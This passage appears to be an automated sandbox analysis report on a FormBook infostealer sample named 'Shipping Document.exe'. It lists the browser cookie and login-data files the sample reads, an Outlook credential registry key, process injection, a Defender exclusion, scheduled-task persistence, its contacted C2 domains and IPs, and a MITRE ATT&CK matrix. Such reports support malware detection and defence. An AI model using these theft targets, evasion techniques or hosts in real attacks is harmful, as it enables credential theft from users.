                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Shipping Document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.Shipping Document.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.Shipping Document.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1435018247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3687248383.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3704953659.0000000005CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3701996615.0000000003900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1436402174.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3699622847.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3701837200.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1438223772.0000000001420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\xcopy.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.Shipping Document.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.Shipping Document.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1435018247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3687248383.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3704953659.0000000005CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3701996615.0000000003900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1436402174.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3699622847.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3701837200.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1438223772.0000000001420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                File and Directory Discovery                		Remote Services1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory113
                System Information Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)312
                Process Injection                		1
                Abuse Elevation Control Mechanism                		Security Account Manager321
                Security Software Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                Scheduled Task/Job                		4
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script13
                Software Packing                		LSA Secrets41
                Virtualization/Sandbox Evasion                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Timestomp                		Cached Domain Credentials1
                Application Window Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Masquerading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                Virtualization/Sandbox Evasion                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1630657 Sample: Shipping Document.exe Startdate: 06/03/2025 Architecture: WINDOWS Score: 100 56 www.vaishnavi.xyz 2->56 58 www.noudge.xyz 2->58 60 14 other IPs or domains 2->60 72 Suricata IDS alerts for network traffic 2->72 74 Sigma detected: Scheduled temp file as task from temp location 2->74 76 Multi AV Scanner detection for submitted file 2->76 80 12 other signatures 2->80 10 Shipping Document.exe 7 2->10         started        14 KOENBvWt.exe 5 2->14         started        signatures3 78 Performs DNS queries to domains with low reputation 58->78 process4 file5 48 C:\Users\user\AppData\Roaming\KOENBvWt.exe, PE32 10->48 dropped 50 C:\Users\...\KOENBvWt.exe:Zone.Identifier, ASCII 10->50 dropped 52 C:\Users\user\AppData\Local\...\tmpC1E2.tmp, XML 10->52 dropped 54 C:\Users\user\...\Shipping Document.exe.log, ASCII 10->54 dropped 82 Suspicious powershell command line found 10->82 84 Adds a directory exclusion to Windows Defender 10->84 86 Injects a PE file into a foreign processes 10->86 16 Shipping Document.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        88 Multi AV Scanner detection for dropped file 14->88 25 schtasks.exe 1 14->25         started        27 KOENBvWt.exe 14->27         started        signatures6 process7 signatures8 68 Maps a DLL or memory area into another process 16->68 29 rtO5LARBHjW9nKZi.exe 16->29 injected 70 Loading BitLocker PowerShell Module 19->70 33 WmiPrvSE.exe 19->33         started        35 conhost.exe 19->35         started        37 conhost.exe 21->37         started        39 conhost.exe 23->39         started        41 conhost.exe 25->41         started        process9 dnsIp10 62 www.vaishnavi.xyz 92.204.40.98, 50004, 50005, 50006 GD-EMEA-DC-CGN1DE Germany 29->62 64 www.vsilmhxj.tokyo 8.210.49.139, 49781, 49786, 49790 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 29->64 66 7 other IPs or domains 29->66 98 Found direct / indirect Syscall (likely to bypass EDR) 29->98 43 xcopy.exe 29->43         started        signatures11 process12 signatures13 90 Tries to steal Mail credentials (via file / registry access) 43->90 92 Tries to harvest and steal browser information (history, passwords, etc) 43->92 94 Modifies the context of a thread in another process (thread injection) 43->94 96 2 other signatures 43->96 46 firefox.exe 43->46         started        process14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.